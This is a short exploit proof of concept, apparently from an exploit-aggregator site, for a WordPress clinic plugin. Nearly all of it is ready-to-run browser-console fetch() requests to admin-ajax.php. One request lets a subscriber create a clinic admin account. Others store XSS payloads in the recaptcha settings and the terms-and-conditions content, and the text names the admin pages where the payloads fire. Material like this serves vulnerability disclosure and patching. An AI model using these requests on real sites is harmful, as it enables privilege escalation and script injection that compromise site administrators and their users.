## https://sploitus.com/exploit?id=WPEX-ID:162D0029-2ADC-4925-9985-1D5D672DBE75
Run one of the below commands in the developer console of the web browser while being on the blog as subscriber user.
To add a clinic admin:
fetch("/wp-admin/admin-ajax.php", {
"headers": {
"content-type": "application/x-www-form-urlencoded",
},
"method": "POST",
"body": 'action=ajax_post&route_name=setup_clinic_admin&first_name=Attacker&last_name=Attacker&user_email=attacker@localhost.org&mobile_number=11&gender=other',
"credentials": "include"
}).then(response => response.text())
.then(data => console.log(data));
Then login with the username and credentials sent to the attacker@localhost.org email address
To update the Recaptcha settings (with an XSS payload)
fetch("/wp-admin/admin-ajax.php", {
"headers": {
"content-type": "application/x-www-form-urlencoded",
},
"method": "POST",
"body": 'action=ajax_post&route_name=save_google_recaptcha_setting&status=on&site_key=<svg onload=alert(`XSS-site-key`)>&secret_key=<svg onload=alert(`XSS-secret-key`)>',
"credentials": "include"
}).then(response => response.text())
.then(data => console.log(data));
The XSS will be triggered when an admin open https://example.com/wp-admin/admin-ajax.php?action=ajax_get&route_name=get_all_general_setting
To update the term and conditions message with an XSS payload:
fetch("/wp-admin/admin-ajax.php", {
"headers": {
"content-type": "application/x-www-form-urlencoded",
},
"method": "POST",
"body": 'action=ajax_post&route_name=terms_condition_save&isVisible=1&content="><svg onload=alert(`XSS`)>"',
"credentials": "include"
}).then(response => response.text())
.then(data => console.log(data));
Then the XSS will be triggered when accessing https://example.com/wp-admin/admin-ajax.php?action=ajax_get&route_name=terms_condition_list (there might be other location the payload is triggered)